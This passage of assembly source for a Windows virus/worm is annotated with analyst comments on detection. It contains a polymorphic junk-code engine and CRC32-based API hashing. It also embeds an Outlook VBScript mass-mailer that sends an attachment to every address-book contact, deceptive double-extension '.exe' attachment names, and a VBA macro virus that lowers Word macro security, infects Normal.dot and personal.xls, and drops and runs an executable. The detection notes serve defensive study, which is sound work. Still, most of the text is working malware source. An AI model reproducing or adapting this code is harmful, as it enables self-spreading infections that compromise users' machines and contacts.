DB 029h, 0C2h ; SUB EDX, EAX
|
|||
|
DB 029h, 0DAh ; SUB EDX, EBX
|
|||
|
DB 029h, 0F2h ; SUB EDX, ESI
|
|||
|
DB 029h, 0C6h ; SUB ESI, EAX
|
|||
|
DB 029h, 0DEh ; SUB ESI, EBX
|
|||
|
DB 029h, 0D6h ; SUB ESI, EDX
|
|||
|
DB 031h, 0D8h ; XOR EAX, EBX
|
|||
|
DB 031h, 0D0h ; XOR EAX, EDX
|
|||
|
DB 031h, 0F0h ; XOR EAX, ESI
|
|||
|
DB 031h, 0C3h ; XOR EBX, EAX
|
|||
|
DB 031h, 0D3h ; XOR EBX, EDX
|
|||
|
DB 031h, 0F3h ; XOR EBX, ESI
|
|||
|
DB 031h, 0C2h ; XOR EDX, EAX
|
|||
|
DB 031h, 0DAh ; XOR EDX, EBX
|
|||
|
DB 031h, 0F2h ; XOR EDX, ESI
|
|||
|
DB 031h, 0C6h ; XOR ESI, EAX
|
|||
|
DB 031h, 0DEh ; XOR ESI, EBX
|
|||
|
DB 031h, 0D6h ; XOR ESI, EDX
|
|||
|
|
|||
|
@Basura_4:
|
|||
|
MOV AL, 068h ; PUSH
|
|||
|
STOSB
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSD
|
|||
|
|
|||
|
PUSH 03h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B4_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSB
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B4_Tabla:
|
|||
|
DB 058h ; POP EAX
|
|||
|
DB 05Bh ; POP EBX
|
|||
|
DB 05Ah ; POP EDX
|
|||
|
DB 05Eh ; POP ESI
|
|||
|
|
|||
|
@Basura_5:
|
|||
|
PUSH 11d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B5_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSB
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B5_Tabla:
|
|||
|
DB 040h ; inc eax
|
|||
|
DB 043h ; inc ebx
|
|||
|
DB 042h ; inc edx
|
|||
|
DB 046h ; inc esi
|
|||
|
DB 048h ; dec eax
|
|||
|
DB 04Bh ; dec ebx
|
|||
|
DB 04Ah ; dec edx
|
|||
|
DB 04Eh ; dec esi
|
|||
|
DB 093h ; xchg ebx,eax
|
|||
|
DB 092h ; xchg edx,eax
|
|||
|
DB 096h ; xchg esi,eax
|
|||
|
DB 093h ; xchg ebx,eax
|
|||
|
|
|||
|
@Basura_6:
|
|||
|
PUSH 13d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B6_Tabla]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B6_Tabla:
|
|||
|
DB 0F7h, 0D0h ; not eax
|
|||
|
DB 0F7h, 0D3h ; not ebx
|
|||
|
DB 0F7h, 0D2h ; not edx
|
|||
|
DB 0F7h, 0D6h ; not esi
|
|||
|
DB 0F7h, 0D8h ; neg eax
|
|||
|
DB 0F7h, 0DBh ; neg ebx
|
|||
|
DB 0F7h, 0DAh ; neg edx
|
|||
|
DB 0F7h, 0DEh ; neg esi
|
|||
|
DB 087h, 0DAh ; xchg ebx,edx
|
|||
|
DB 087h, 0DEh ; xchg ebx,esi
|
|||
|
DB 087h, 0D3h ; xchg edx,ebx
|
|||
|
DB 087h, 0D6h ; xchg edx,esi
|
|||
|
DB 087h, 0F3h ; xchg esi,ebx
|
|||
|
DB 087h, 0F2h ; xchg esi,edx
|
|||
|
|
|||
|
@Basura_7:
|
|||
|
PUSH 31d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B7_Tabla]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSB
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B7_Tabla:
|
|||
|
DB 0C1h, 0D0h ; rcl eax
|
|||
|
DB 0C1h, 0D3h ; rcl ebx
|
|||
|
DB 0C1h, 0D2h ; rcl edx
|
|||
|
DB 0C1h, 0D6h ; rcl esi
|
|||
|
DB 0C1h, 0D8h ; rcr eax
|
|||
|
DB 0C1h, 0DBh ; rcr ebx
|
|||
|
DB 0C1h, 0DAh ; rcr edx
|
|||
|
DB 0C1h, 0DEh ; rcr esi
|
|||
|
DB 0C1h, 0C0h ; rol eax
|
|||
|
DB 0C1h, 0C3h ; rol ebx
|
|||
|
DB 0C1h, 0C2h ; rol edx
|
|||
|
DB 0C1h, 0C6h ; rol esi
|
|||
|
DB 0C1h, 0C8h ; ror eax
|
|||
|
DB 0C1h, 0CBh ; ror ebx
|
|||
|
DB 0C1h, 0CAh ; ror edx
|
|||
|
DB 0C1h, 0CEh ; ror esi
|
|||
|
DB 0C1h, 0E0h ; shl eax
|
|||
|
DB 0C1h, 0E3h ; shl ebx
|
|||
|
DB 0C1h, 0E2h ; shl edx
|
|||
|
DB 0C1h, 0E6h ; shl esi
|
|||
|
DB 0C1h, 0F8h ; sar eax
|
|||
|
DB 0C1h, 0FBh ; sar ebx
|
|||
|
DB 0C1h, 0FAh ; sar edx
|
|||
|
DB 0C1h, 0FEh ; sar esi
|
|||
|
DB 0C1h, 0E0h ; shl eax
|
|||
|
DB 0C1h, 0E3h ; shl ebx
|
|||
|
DB 0C1h, 0E2h ; shl edx
|
|||
|
DB 0C1h, 0E6h ; shl esi
|
|||
|
DB 0C1h, 0E8h ; shr eax
|
|||
|
DB 0C1h, 0EBh ; shr ebx
|
|||
|
DB 0C1h, 0EAh ; shr edx
|
|||
|
DB 0C1h, 0EEh ; shr esi
|
|||
|
|
|||
|
; State shared by the poly-engine routines inside PXPE (the PROC header is
; further up, outside this view). Names are Spanish: Semilla = seed,
; Llave = key, Origen/Destino/Tamaño = source/destination/size,
; Guarda = saved. How each field is used is not visible here.
@SaveSemilla DB 8 DUP (00h)             ; 8-byte seed save area (two dwords - likely a
                                        ; copy of Semilla_1/Semilla_2; confirm at the writer)

Semilla_1 DD 00000000h                  ; seed 1
Semilla_2 DD 00000000h                  ; seed 2
Llave DD 00000000h                      ; key

Origen DD 00000000h                     ; source pointer
Destino DD 00000000h                    ; destination pointer
Tama<EFBFBD>o DD 00000000h                     ; "Tamaño" (size); the ñ is mangled in this listing

GuardaDelta DD 00000000h                ; saved delta values (presumably the relocation
GuardaDelta2 DD 00000000h               ; offset the virus computes at run time)
GuardaLoop DD 00000000h                 ; saved loop counter (name only; use not visible)

Mierda_1 EQU 1A7FC23Bh                  ; four fixed constants; their use is outside this
Mierda_2 EQU 000028B1h                  ; view. If they are emitted as immediates or used as
Mierda_3 EQU 974D9DB5h                  ; hash values they are invariant across mutations
Mierda_4 EQU 0000F3C9h                  ; and therefore candidate signature material.
|
|||
|
|
|||
|
PXPE ENDP
|
|||
|
|
|||
|
; ------------------------------------------------------------------------
|
|||
|
|
|||
|
;***************************************************************
|
|||
|
;* aPLib v0.22b - the smaller the better :) *
|
|||
|
;* WASM & TASM assembler depacker *
|
|||
|
;* *
|
|||
|
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
|
|||
|
;***************************************************************
|
|||
|
|
|||
|
;.386p
|
|||
|
;.MODEL flat
|
|||
|
|
|||
|
;.CODE
|
|||
|
|
|||
|
;PUBLIC _aP_depack_asm
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; unsigned _aP_depack_asm(const void *src, void *dst)   (aPLib v0.22b, Jibz)
; Frame: [ebp+8] = packed source, [ebp+12] = destination (C calling
;        convention, as the original comment says).
; Out:   EAX = number of bytes written to dst. It is stored into pushad's
;        saved-EAX slot ([ebp-4]) at donedepacking so that popad returns it.
; Regs:  all general registers are preserved by pushad/popad. Inside the
;        loop: ESI = source cursor, EDI = destination cursor, DL = tag-bit
;        buffer, ECX = match length, EAX = match offset, EBP = last match
;        offset (the real frame pointer is parked by the extra PUSH EBP).
; Safety: there are NO bounds checks. The routine never learns the size of
;        dst, `sub esi, eax` trusts the encoded offset, and src is read
;        until a zero short-match marker is found. A malformed or truncated
;        stream reads and writes out of bounds. Anyone reusing this depacker
;        in analysis tooling must check output space and require
;        offset <= bytes written so far before copying.
;-----------------------------------------------------------------------
_aP_depack_asm:
        push ebp
        mov ebp, esp
        pushad
        push ebp                        ; park the frame pointer; ebp is "last offset" from here

        mov esi, [ebp + 8]              ; C calling convention: src
        mov edi, [ebp + 12]             ;                       dst

        cld
        mov dl, 80h                     ; tag buffer; its single 1 bit is a sentinel that
                                        ; tells getbit when the byte is exhausted

literal:
        movsb                           ; tag 0: copy one literal byte
nexttag:
        call getbit
        jnc literal

        xor ecx, ecx
        call getbit
        jnc codepair                    ; tag 10: gamma-coded offset/length pair
        xor eax, eax
        call getbit
        jnc shortmatch                  ; tag 110: one-byte short match
        mov al, 10h                     ; tag 111: read 4 bits - the 10h marker reaches
getmorebits:                            ; CF after exactly four shifts
        call getbit
        adc al, al
        jnc getmorebits
        jnz domatch_with_inc            ; nonzero nibble: copy 1 byte from offset 1..15
        stosb                           ; zero nibble: emit a literal 00h (al = 0)
        jmp short nexttag
codepair:
        call getgamma_no_ecx            ; ecx = gamma value (>= 2)
        dec ecx
        loop normalcodepair             ; gamma != 2: a new offset follows
        mov eax,ebp                     ; gamma == 2: reuse the last offset
        call getgamma                   ; ecx = length
        jmp short domatch

shortmatch:
        lodsb                           ; eax was zeroed above, so eax = byte
        shr eax, 1                      ; eax = 7-bit offset, CF = low bit
        jz donedepacking                ; offset 0 is the end-of-stream marker
        adc ecx, 2                      ; length = 2 + CF (ecx was 0)
        mov ebp, eax                    ; remember as last offset
        jmp short domatch

normalcodepair:
        xchg eax, ecx                   ; eax = gamma - 2 (loop already decremented)
        dec eax
        shl eax, 8
        lodsb                           ; offset = ((gamma - 3) << 8) | next byte
        mov ebp, eax                    ; remember as last offset
        call getgamma                   ; ecx = base length
        cmp eax, 32000                  ; long offsets carry an implicit +2 ...
        jae domatch_with_2inc
        cmp eax, 1280                   ; ... medium ones +1 ...
        jae domatch_with_inc
        cmp eax, 7fh                    ; ... and offsets <= 7Fh +2 again
        ja domatch

domatch_with_2inc:
        inc ecx

domatch_with_inc:
        inc ecx
domatch:
        push esi
        mov esi, edi
        sub esi, eax                    ; copy from already-written output at dst - offset
        rep movsb                       ; byte-wise, so overlapping runs repeat correctly
        pop esi
        jmp short nexttag

; getbit: shifts the next tag bit into CF. `add dl, dl` leaves DL = 0 exactly
; when the sentinel bit has been shifted out; the reload then uses `adc` so
; the carry from that add (mov and inc preserve CF) re-inserts the sentinel
; at bit 0 while the new byte's top bit becomes the result in CF.
getbit:
        add dl, dl
        jnz stillbitsleft
        mov dl, [esi]
        inc esi
        adc dl, dl
stillbitsleft:
        ret

; getgamma: decodes one variable-length number into ecx. Starting from
; ecx = 1, each data bit is shifted in and a following 0 continuation bit
; ends the number, so results are >= 2. getgamma_no_ecx continues from the
; caller's ecx (0 at codepair) instead of clearing it.
getgamma:
        xor ecx, ecx
getgamma_no_ecx:
        inc ecx
getgammaloop:
        call getbit
        adc ecx, ecx
        call getbit
        jc getgammaloop
        ret

donedepacking:
        pop ebp                         ; restore the real frame pointer
        sub edi, [ebp + 12]             ; bytes written = edi - dst
        mov [ebp - 4], edi              ; return unpacked length in eax
                                        ; ([ebp-4] is the EAX slot that pushad saved first)

        popad
        pop ebp
        ret
|
|||
|
|
|||
|
; ------------------------------------------------------------------------
|
|||
|
|
|||
|
; Billy Belcebu's CRC32 calculator.
;
; CRC32 procedure
; --------------+
;
; Computes the standard reflected CRC-32 (polynomial EDB88320h, initial
; value FFFFFFFFh, final complement) - the same value zlib's crc32() gives -
; one bit at a time. The running CRC is kept byte-wise in CL:CH:DL:DH and the
; per-byte term is built in the 16-bit pair BX:AX.
;
; input:
;        ESI = Offset where code to calculate begins
;        EDI = Size of that code. Must be > 0: the loop is `dec edi / jnz`,
;              so a size of 0 wraps and the loop runs over 4 GiB.
; output:
;        EAX = CRC32 of given code
;        ESI = advanced past the buffer, EDI = 0
; clobbers:
;        EBX, ECX, EDX, flags. Callers with live values there must save them
;        (Random below does).
;
; Analyst note: the virus matches API names and file names by this hash
; rather than by string (see CRC32_GetProcAddress EQU 0FFC97C1Fh further
; down), so those names never appear in the binary. The fixed hash
; constants are therefore good static-signature material.
;

CRC32 proc
        cld
        xor ecx,ecx                     ; Optimized by me - 2 bytes
        dec ecx                         ; less        -> ecx = FFFFFFFFh (initial CRC)
        mov edx,ecx                     ; high half also FFFFFFFFh
NextByteCRC:
        xor eax,eax
        xor ebx,ebx
        lodsb
        xor al,cl                       ; al = (crc ^ byte) & 0FFh
        mov cl,ch                       ; crc >>= 8 across CL,CH,DL,DH
        mov ch,dl
        mov dl,dh
        mov dh,8                        ; DH doubles as the bit counter; it is 0 again
                                        ; when the xor below needs the shifted-in zero byte
NextBitCRC:
        shr bx,1                        ; 32-bit right shift of BX:AX, low bit -> CF
        rcr ax,1
        jnc NoCRC
        xor ax,08320h                   ; xor with EDB88320h: low word ...
        xor bx,0EDB8h                   ; ... and high word
NoCRC:  dec dh
        jnz NextBitCRC
        xor ecx,eax                     ; crc = (crc >> 8) ^ term
        xor edx,ebx
        dec edi                         ; 1 byte less
        jnz NextByteCRC
        not edx                         ; final complement; also clears the stale
        not ecx                         ; FFFFh upper halves of ECX/EDX
        mov eax,edx
        rol eax,16                      ; eax = DX:CX
        mov ax,cx
        ret
CRC32 endp
|
|||
|
|
|||
|
; ------------------------------------------------------------------------
|
|||
|
|
|||
|
; General-purpose pseudo-random number generator.
;
; EBX -> upper limit (exclusive)
;
; Random PROC
; In:    EBX = upper limit
; Out:   EAX = (CRC32(low dword of RDTSC) XOR CRC32(GetTickCount)) mod EBX,
;        i.e. a value in 0..EBX-1
; Saved: ECX, EDX, EDI, EBX (push/pop below).
; Clobbered: ESI (left pointing into Mariconada by the second CRC32 call),
;        flags.
; Notes: EBX = 0 raises a divide fault at DIV EBX; nothing checks it here.
;        The seed dwords are written to Mariconada, which sits inline in
;        the code, so the section must be writable at run time - writable
;        code sections are themselves a common static indicator.
;        Both seeds are time-based, so the stream is reproducible under an
;        emulator that pins RDTSC and GetTickCount; nothing here is
;        cryptographic.

Random PROC

        PUSH ECX EDX EDI EBX            ; EBX pushed last so POP EBX below returns the limit

        LEA EDI, OFS [Mariconada]
        RDTSC
        STOSD                           ; Mariconada = low dword of the timestamp counter
        PUSH 04h
        POP EDI                         ; EDI = 4 bytes for CRC32
        LEA ESI, OFS [Mariconada]
        CALL CRC32
        XCHG EDX, EAX                   ; EDX = CRC32(tsc)

        PUSH EDX
        LEA EDI, OFS [Mariconada]
        APICALL GetTickCount            ; macro; presumably calls through the GetTickCount slot
        STOSD                           ; Mariconada = tick count
        SUB EDI, 04h
        XCHG EDI, ESI                   ; ESI = Mariconada
        PUSH 04h
        POP EDI                         ; EDI = 4 bytes
        CALL CRC32                      ; EAX = CRC32(ticks)
        POP EDX                         ; EDX = CRC32(tsc)

        PUSH EAX
        OR EAX, EDX                     ; (a | b) ...
        POP ECX
        AND EDX, ECX                    ; ... ^ (a & b) == a ^ b; the extra
                                        ; instructions only obscure a plain XOR
        XOR EAX, EDX

        POP EBX                         ; EBX = upper limit
        XOR EDX, EDX
        DIV EBX                         ; faults if EBX = 0
        XCHG EDX, EAX                   ; EAX = remainder

        POP EDI EDX ECX
        RET

Mariconada DB 9 DUP (00h)               ; in-code scratch buffer; only 4 bytes are used here

Random ENDP
|
|||
|
|
|||
|
; ------------------------------------------------------------------------
|
|||
|
|
|||
|
; TABLA!  - token key for the compressed API-name table below.
;
; Create    -> 01h
; File      -> 02h
; Map       -> 03h
; View      -> 04h
; Close     -> 05h
; Get       -> 06h
; Set       -> 07h
; Find      -> 08h
; Virtual   -> 09h
; Window    -> 0Ah
; Directory -> 0Bh
; Current   -> 0Ch
; WaitFor   -> 0Dh
; Thread    -> 0Eh

HThread DD 00000000h                    ; thread handle (use not visible here)

; Kernel32 import names with the common words replaced by the 1-byte tokens
; above. 00h ends each name, 0FFh ends the table. The DD slots that follow
; list the same 26 names in the same order, so they appear to receive the
; resolved addresses; the resolver itself is outside this view.
; Analyst note: because the names are token-compressed, a plain strings scan
; of the binary does not show "CreateFileA" and friends. The decoded set -
; file mapping plus FindFirst/FindNext, CreateThread, SetFileAttributes and
; DeleteFile - is the usual file-infector profile, which behavioural
; monitoring catches regardless of how the names are stored.
APIs_K32 DB 01h, 02h, "A", 00h                  ; CreateFileA
        DB 01h, 02h, 03h, "pingA", 00h          ; CreateFileMappingA
        DB 03h, 04h, "Of", 02h, 00h             ; MapViewOfFile
        DB "Unmap", 04h, "Of", 02h, 00h         ; UnmapViewOfFile
        DB 05h, "Handle", 00h                   ; CloseHandle
        DB 06h, 02h, "Size", 00h                ; GetFileSize
        DB 07h, 02h, "Pointer", 00h             ; SetFilePointer
        DB 07h, "EndOf", 02h, 00h               ; SetEndOfFile
        DB 07h, 02h, "AttributesA", 00h         ; SetFileAttributesA
        DB "Write", 02h, 00h                    ; WriteFile
        DB 08h, "First", 02h, "A", 00h          ; FindFirstFileA
        DB 08h, "Next", 02h, "A", 00h           ; FindNextFileA
        DB 08h, 05h, 00h                        ; FindClose
        DB 09h, "Alloc", 00h                    ; VirtualAlloc
        DB 09h, "Free", 00h                     ; VirtualFree
        DB 06h, 0Ah, "s", 0Bh, "A", 00h         ; GetWindowsDirectoryA
        DB 06h, 0Ch, 0Bh, "A", 00h              ; GetCurrentDirectoryA
        DB 07h, 0Ch, 0Bh, "A", 00h              ; SetCurrentDirectoryA
        DB 01h, 0Eh, 00h                        ; CreateThread
        DB "Exit", 0Eh, 00h                     ; ExitThread
        DB 0Dh, "MultipleObjects", 00h          ; WaitForMultipleObjects
        DB 0Dh, "SingleObject", 00h             ; WaitForSingleObject
        DB 06h, "TickCount", 00h                ; GetTickCount
        DB "LoadLibraryA", 00h                  ; (not tokenised)
        DB "Delete", 02h, "A", 00h              ; DeleteFileA
        DB 07h, 0Eh, "Priority", 00h            ; SetThreadPriority
        DB 0FFh                                 ; end of table

; Resolved address slots, one per table entry above, in table order.
CreateFileA DD 00000000h
CreateFileMappingA DD 00000000h
MapViewOfFile DD 00000000h
UnmapViewOfFile DD 00000000h
CloseHandle DD 00000000h
GetFileSize DD 00000000h
SetFilePointer DD 00000000h
SetEndOfFile DD 00000000h
SetFileAttributesA DD 00000000h
WriteFile DD 00000000h
FindFirstFileA DD 00000000h
FindNextFileA DD 00000000h
FindClose DD 00000000h
VirtualAlloc DD 00000000h
VirtualFree DD 00000000h
GetWindowsDirectoryA DD 00000000h
GetCurrentDirectoryA DD 00000000h
SetCurrentDirectoryA DD 00000000h
CreateThread DD 00000000h
ExitThread DD 00000000h
WaitForMultipleObjects DD 00000000h
WaitForSingleObject DD 00000000h
GetTickCount DD 00000000h
LoadLibraryA DD 00000000h
DeleteFileA DD 00000000h
SetThreadPriority DD 00000000h

KERNEL32 DD 00000000h                   ; kernel32 base address (presumably)

; One slot per worker thread (the header describes the virus as
; multithreaded): direct-action infector, VBS mail worm, Word infector, host.
Thread_Directa DD 00000000h
Thread_WormVBS DD 00000000h
Thread_IWord DD 00000000h
Thread_Host DD 00000000h

Listo_Directa DB 00h                    ; "direct-action done" flag (listo = ready); use not visible

GetProcAddress DD 00000000h
Exports DD 00000000h                    ; export-table pointer (name only)

CRC32_GetProcAddress EQU 0FFC97C1Fh     ; GetProcAddress is located by CRC32 of its export
l_GetProcAddress EQU 0Fh                ; name rather than by string. 0Fh is strlen+1, which
                                        ; suggests the hash covers the terminating NUL -
                                        ; confirm against the resolver before reusing the value.

Scriptum DD 00000000h
GuardaNom DD 00000000h                  ; saved name (guarda = save, nom = name)
LargoVBS DB 00h                         ; VBS length byte (largo = length)
FHandle_WVBS DD 00000000h               ; file handle, mapping handle and map base used by
MHandle_WVBS DD 00000000h               ; the worm-VBS thread (WVBS)
BaseMap_WVBS DD 00000000h
|
|||
|
|
|||
|
; Outlook mass-mailer script (gusano = worm), first fragment. This fragment
; ends inside the `.Attachments.Add "` literal and Gusano_VBS2 begins with
; the closing quote, so the attachment path is written between them at run
; time by code outside this view.
; What the script does: automates Outlook through COM, takes the MAPI
; namespace, and for every address list builds one new mail item with the
; dropped file attached and every entry of that list as a recipient, then
; sends it (second fragment).
; Analyst notes: 'On Error Resume Next' hides every failure, and the
; `Outlook <> ""` test is not a real object check - it only "works" because
; errors are suppressed. A script host creating Outlook.Application and
; enumerating AddressLists/AddressEntries before .Attachments.Add/.Send is
; the classic mailer pattern for host-based detection; the strings
; raxelp.vbs and wscript.exe further down suggest the script is dropped
; under that name and launched with wscript.exe.
Gusano_VBS LABEL NEAR
        DB 'On Error Resume Next', 0Dh, 0Ah
        DB 'Set Outlook = CreateObject("OutLook.Application")', 0Dh, 0Ah
        DB 'If ( Outlook <> "" ) Then', 0Dh, 0Ah
        DB 'With Outlook', 0Dh, 0Ah
        DB 'Set MAPI = .GetNameSpace("MAPI")', 0Dh, 0Ah
        DB 'End With', 0Dh, 0Ah
        DB 'With MAPI', 0Dh, 0Ah
        DB 'Set AddrList = .AddressLists', 0Dh, 0Ah
        DB 'End With', 0Dh, 0Ah
        DB 'For I = 1 to AddrList.Count', 0Dh, 0Ah
        DB 'With OutLook', 0Dh, 0Ah
        DB 'Set NuevoMail = .CreateItem(0)', 0Dh, 0Ah
        DB 'End With', 0Dh, 0Ah
        DB 'Set LibroActual = AddrList.Item(I)', 0Dh, 0Ah
        DB 'With NuevoMail', 0Dh, 0Ah
        DB '.Attachments.Add "'                  ; path is appended at run time
L_Gusano_VBS EQU $-Gusano_VBS                   ; length of this fragment
|
|||
|
|
|||
|
; Outlook mass-mailer script, second fragment: closes the attachment path,
; adds every AddressEntry of the current list as a recipient, sends the
; mail, loops to the next list, then quits Outlook.
; Analyst note: the .Recipients/.Send pair inside a loop over AddressEntries
; is the behaviour to alert on; Outlook object-model guards that prompt on
; programmatic Send/address-book access block exactly this path.
Gusano_VBS2 LABEL NEAR
        DB '"', 0Dh, 0Ah                        ; closing quote of .Attachments.Add
        DB 'End With', 0Dh, 0Ah
        DB 'Set Yuca = LibroActual.AddressEntries', 0Dh, 0Ah
        DB 'With Yuca', 0Dh, 0Ah
        DB 'For J = 1 to .Count', 0Dh, 0Ah
        DB 'With NuevoMail', 0Dh, 0Ah
        DB 'Set bajo = .Recipients', 0Dh, 0Ah
        DB 'bajo.Add Yuca(J)', 0Dh, 0Ah
        DB 'End With', 0Dh, 0Ah
        DB 'Next', 0Dh, 0Ah
        DB 'End With', 0Dh, 0Ah
        DB 'With NuevoMail', 0Dh, 0Ah
        DB '.Send', 0Dh, 0Ah
        DB 'End With', 0Dh, 0Ah
        DB 'Next', 0Dh, 0Ah
        DB 'Outlook.Quit', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
L_Gusano_VBS2 EQU $-Gusano_VBS2                 ; length of this fragment
|
|||
|
|
|||
|
; Candidate attachment names (nombres varios = assorted names); how one is
; chosen is outside this view. The .jpg/.gif/.mp3/.html entries are padded
; with 20 spaces before the real ".exe" so the true extension scrolls out of
; view in a mail client; the .scr entries rely on screensavers being
; executable. Double extensions with whitespace padding are a standard
; mail-gateway detection rule.
Nombres_Varios DB "XD", 00h
        DB "Sex.jpg", 20d DUP (" "), ".exe", 00h
        DB "Porno.gif", 20d DUP (" "), ".exe", 00h
        DB "Free_XXX.jpg", 20d DUP (" "), ".exe", 00h
        DB "Great_Music.mp3", 20d DUP (" "), ".exe", 00h
        DB "Check_This.jpg", 20d DUP (" "), ".exe", 00h
        DB "Cool_Pics.gif", 20d DUP (" "), ".exe", 00h
        DB "Love_Story.html", 20d DUP (" "), ".exe", 00h
        DB "Sexy_Screensaver.scr", 00h
        DB "Free_Love_Screensaver.scr", 00h
        DB "Eat_My_Shorts.scr", 00h

Raxelp_vbs DB "raxelp.vbs", 00h         ; file name for the dropped worm script (host IoC)
WScript_exe DB "wscript.exe", 00h       ; script host presumably used to run it

Tabla_Hex DB "0123456789ABCDEF", 00h    ; nibble -> hex digit table; the macro dropper
                                        ; carries the PE as a hex string (see Correme below)

FHandle_IW DD 00000000h                 ; file handle, mapping handle, map base, size and
MHandle_IW DD 00000000h                 ; buffer used by the Word-infector thread (IW)
BaseMap_IW DD 00000000h
Tama<EFBFBD>o_IW DD 00000000h                  ; "Tamaño_IW" (size); the ñ is mangled in this listing
Memoria_IW DD 00000000h
Macaco DB 13d DUP (00h)                 ; 13-byte scratch area (use not visible here)
|
|||
|
|
|||
|
; VBA module "Plexar", first fragment. It is imported into Normal.dot and
; personal.xls by the VBScript further down and then spreads between Office
; documents on its own. This fragment ends inside the `joda = "` literal;
; the hex-encoded PE goes there and the closing quote/line break must be
; written by the dropper before Virus_Macro_2 (not visible here).
;   Auto_Open (Excel):  hooks Application.OnSheetActivate to InfXL.
;   InfXL (Excel):      exports this module to c:\plx.$$$, imports it into the
;                       active workbook if missing, creates a hidden
;                       personal.xls in the startup path with the module if
;                       none exists, deletes the temp file, calls Correme.
;   AutoClose (Word):   writes 1 to HKCU\Software\Microsoft\Office\9.0 and
;                       8.0\Word\Security\Level (lowest macro security),
;                       exports the module and imports it into NormalTemplate
;                       and the active document if missing, calls Correme.
;   Correme (fragment 2): decodes the hex string to %windir%\raxelp.exe and
;                       runs it hidden.
; Detection/mitigation: the Security\Level registry writes, a VBA component
; named "Plexar" in Normal.dot or personal.xls, c:\plx.$$$ and
; %windir%\raxelp.exe are the host artifacts. Denying programmatic access to
; the VBA project (the VBProject.VBComponents Import/Export path) blocks
; every propagation step here.
; Note: `(2 * 4 + 4 / 6 - 2)` is an obfuscated nonzero constant (about 6.67);
; VBA coerces it to True when assigned to these Boolean options.
Virus_Macro LABEL NEAR
        DB 'Attribute VB_Name = "Plexar"', 0Dh, 0Ah
        DB 'Sub Auto_Open()', 0Dh, 0Ah
        DB 'Application.OnSheetActivate = "InfXL"', 0Dh, 0Ah
        DB 'End Sub', 0Dh, 0Ah
        DB 'Sub InfXL()', 0Dh, 0Ah
        DB 'On Error Resume Next', 0Dh, 0Ah
        DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
        DB 'Set VBP = Application.VBE.ActiveVBProject', 0Dh, 0Ah
        DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
        DB 'Set VBX = VBP.VBComponents', 0Dh, 0Ah
        DB 'With Application: .ScreenUpdating = Not -1: .DisplayStatusBar = Not -1: .EnableCancelKey = Not -1: .DisplayAlerts = Not -1: End With', 0Dh, 0Ah
        DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$": YYY = Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
        DB 'VBX.Item(ZZZ).Export XXX', 0Dh, 0Ah
        DB 'If AXO.Item(ZZZ).Name <> ZZZ Then', 0Dh, 0Ah
        DB ' AXO.Import XXX: AWO.SaveAs AWO.FullName', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'If (Dir(YYY) = "") Then', 0Dh, 0Ah
        DB 'Workbooks.Add.SaveAs YYY', 0Dh, 0Ah
        DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
        DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
        DB 'AXO.Import XXX', 0Dh, 0Ah
        DB 'ActiveWindow.Visible = Not -1', 0Dh, 0Ah
        DB 'Workbooks("personal.xls").Save', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'Kill XXX', 0Dh, 0Ah
        DB 'Call Correme', 0Dh, 0Ah
        DB 'End Sub', 0Dh, 0Ah
        DB 'Sub AutoClose()', 0Dh, 0Ah
        DB 'On Error Resume Next', 0Dh, 0Ah
        DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$"', 0Dh, 0Ah
        DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
        DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
        DB 'With Options: .VirusProtection = (2 * 4 + 4 / 6 - 2): .ConfirmConversions = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
        DB 'With Application: .DisplayStatusBar = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
        DB 'Set AKT = VBE.ActiveVBProject.VBComponents', 0Dh, 0Ah
        DB 'Set NOX = NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
        DB 'Set DOX = ActiveDocument.VBProject.VBComponents', 0Dh, 0Ah
        DB 'AKT.Item(ZZZ).Export XXX', 0Dh, 0Ah
        DB 'If (NOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
        DB 'NOX.Import XXX', 0Dh, 0Ah
        DB 'NormalTemplate.Save', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'If (DOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
        DB 'DOX.Import XXX', 0Dh, 0Ah
        DB 'ActiveDocument.SaveAs ActiveDocument.FullName', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'Kill XXX', 0Dh, 0Ah
        DB 'Call Correme', 0Dh, 0Ah
